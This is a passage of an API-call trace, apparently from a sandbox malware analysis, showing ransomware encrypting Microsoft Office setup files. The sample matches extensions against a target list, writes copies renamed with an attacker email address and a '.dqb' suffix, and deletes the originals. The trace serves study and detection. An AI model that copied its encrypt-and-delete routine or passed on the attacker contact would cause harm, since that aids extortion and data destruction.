Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.247] lstrlenW (lpString=".jpg") returned 4 [0037.247] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0037.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.247] lstrlenW (lpString=".doc") returned 4 [0037.247] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0037.247] lstrlenW (lpString=".docx") returned 5 [0037.247] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0037.247] lstrlenW (lpString=".pdf") returned 4 [0037.247] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0037.248] lstrlenW (lpString=".xls") returned 4 [0037.248] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0037.248] lstrlenW (lpString=".xlsx") returned 5 [0037.248] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0037.248] lstrlenW (lpString=".ppt") returned 4 [0037.248] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0037.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.248] lstrlenW (lpString=".zip") returned 4 [0037.248] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0037.248] lstrlenW (lpString=".rar") returned 4 [0037.248] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0037.248] lstrlenW (lpString=".bz2") returned 4 [0037.248] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0037.248] lstrlenW (lpString=".7z") returned 3 [0037.248] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0037.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.248] lstrlenW (lpString=".dbf") returned 4 [0037.248] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0037.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.248] lstrlenW (lpString=".1cd") returned 4 [0037.248] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0037.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.248] lstrlenW (lpString=".jpg") returned 4 [0037.248] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0037.434] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.434] lstrlenW (lpString="SETUP.XML") returned 9 [0037.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0038.720] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1452) returned 1 [0038.720] CloseHandle (hObject=0x180) returned 1 [0038.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 0x20 [0038.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0038.721] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0038.721] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0038.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.721] GetLastError () returned 0x0 [0038.721] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5ac, lpOverlapped=0x0) returned 1 [0038.846] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0038.847] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0038.847] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0038.848] SetEndOfFile (hFile=0x1d8) returned 1 [0038.848] CloseHandle (hObject=0x1d8) returned 1 [0038.848] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0038.848] SetEndOfFile (hFile=0x180) returned 1 [0038.849] CloseHandle (hObject=0x180) returned 1 [0038.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.849] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.850] lstrlenW (lpString=".doc") returned 4 [0038.850] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString=".docx") returned 5 [0038.850] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.850] lstrlenW (lpString=".pdf") returned 4 [0038.850] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString=".xls") returned 4 [0038.850] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString=".xlsx") returned 5 [0038.850] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.850] lstrlenW (lpString=".ppt") returned 4 [0038.850] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.850] lstrlenW (lpString=".zip") returned 4 [0038.850] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.850] lstrlenW (lpString=".rar") returned 4 [0038.850] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString=".bz2") returned 4 [0038.850] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString=".7z") returned 3 [0038.850] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.850] lstrlenW (lpString=".dbf") returned 4 [0038.850] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.850] lstrlenW (lpString=".1cd") returned 4 [0038.850] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.850] lstrlenW (lpString=".jpg") returned 4 [0038.850] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.851] lstrlenW (lpString=".doc") returned 4 [0038.851] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString=".docx") returned 5 [0038.851] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.851] lstrlenW (lpString=".pdf") returned 4 [0038.851] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString=".xls") returned 4 [0038.851] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString=".xlsx") returned 5 [0038.851] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.851] lstrlenW (lpString=".ppt") returned 4 [0038.851] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.851] lstrlenW (lpString=".zip") returned 4 [0038.851] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.851] lstrlenW (lpString=".rar") returned 4 [0038.851] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString=".bz2") returned 4 [0038.851] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString=".7z") returned 3 [0038.851] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.851] lstrlenW (lpString=".dbf") returned 4 [0038.851] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.851] lstrlenW (lpString=".1cd") returned 4 [0038.851] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0038.851] lstrlenW (lpString=".jpg") returned 4 [0038.852] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.852] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.852] lstrlenW (lpString="Office32WW.XML") returned 14 [0038.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0038.852] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=4274) returned 1 [0038.852] CloseHandle (hObject=0x180) returned 1 [0038.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 0x20 [0038.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0038.852] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0038.853] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0038.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.853] GetLastError () returned 0x0 [0038.853] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x10b2, lpOverlapped=0x0) returned 1 [0038.870] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0038.871] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0038.871] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf0, lpOverlapped=0x0) returned 1 [0038.871] SetEndOfFile (hFile=0x1d8) returned 1 [0038.872] CloseHandle (hObject=0x1d8) returned 1 [0038.872] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0038.872] SetEndOfFile (hFile=0x180) returned 1 [0038.873] CloseHandle (hObject=0x180) returned 1 [0038.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.873] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString=".doc") returned 4 [0038.874] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString=".docx") returned 5 [0038.874] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0038.874] lstrlenW (lpString=".pdf") returned 4 [0038.874] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString=".xls") returned 4 [0038.874] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString=".xlsx") returned 5 [0038.874] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0038.874] lstrlenW (lpString=".ppt") returned 4 [0038.874] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString=".zip") returned 4 [0038.874] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.874] lstrlenW (lpString=".rar") returned 4 [0038.874] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString=".bz2") returned 4 [0038.874] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString=".7z") returned 3 [0038.874] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString=".dbf") returned 4 [0038.874] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString=".1cd") returned 4 [0038.874] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString=".jpg") returned 4 [0038.874] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.874] lstrlenW (lpString=".doc") returned 4 [0038.875] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString=".docx") returned 5 [0038.875] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0038.875] lstrlenW (lpString=".pdf") returned 4 [0038.875] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString=".xls") returned 4 [0038.875] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString=".xlsx") returned 5 [0038.875] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0038.875] lstrlenW (lpString=".ppt") returned 4 [0038.875] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.875] lstrlenW (lpString=".zip") returned 4 [0038.875] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.875] lstrlenW (lpString=".rar") returned 4 [0038.875] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString=".bz2") returned 4 [0038.875] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString=".7z") returned 3 [0038.875] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.875] lstrlenW (lpString=".dbf") returned 4 [0038.875] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.875] lstrlenW (lpString=".1cd") returned 4 [0038.875] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0038.875] lstrlenW (lpString=".jpg") returned 4 [0038.875] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.875] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.875] lstrlenW (lpString="SETUP.XML") returned 9 [0038.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0039.015] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1988) returned 1 [0039.015] CloseHandle (hObject=0x180) returned 1 [0039.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 0x20 [0039.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0039.016] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.016] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0039.016] GetLastError () returned 0x0 [0039.016] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7c4, lpOverlapped=0x0) returned 1 [0039.024] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0039.025] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0039.025] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.025] SetEndOfFile (hFile=0x1d8) returned 1 [0039.025] CloseHandle (hObject=0x1d8) returned 1 [0039.026] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0039.026] SetEndOfFile (hFile=0x180) returned 1 [0039.027] CloseHandle (hObject=0x180) returned 1 [0039.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.027] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1 [0039.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.027] lstrlenW (lpString=".doc") returned 4 [0039.027] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.027] lstrlenW (lpString=".docx") returned 5 [0039.027] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.027] lstrlenW (lpString=".pdf") returned 4 [0039.027] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.027] lstrlenW (lpString=".xls") returned 4 [0039.027] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.027] lstrlenW (lpString=".xlsx") returned 5 [0039.027] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.027] lstrlenW (lpString=".ppt") returned 4 [0039.027] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0039.027] lstrlenW (lpString=".zip") returned 4 [0039.027] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.028] lstrlenW (lpString=".rar") returned 4 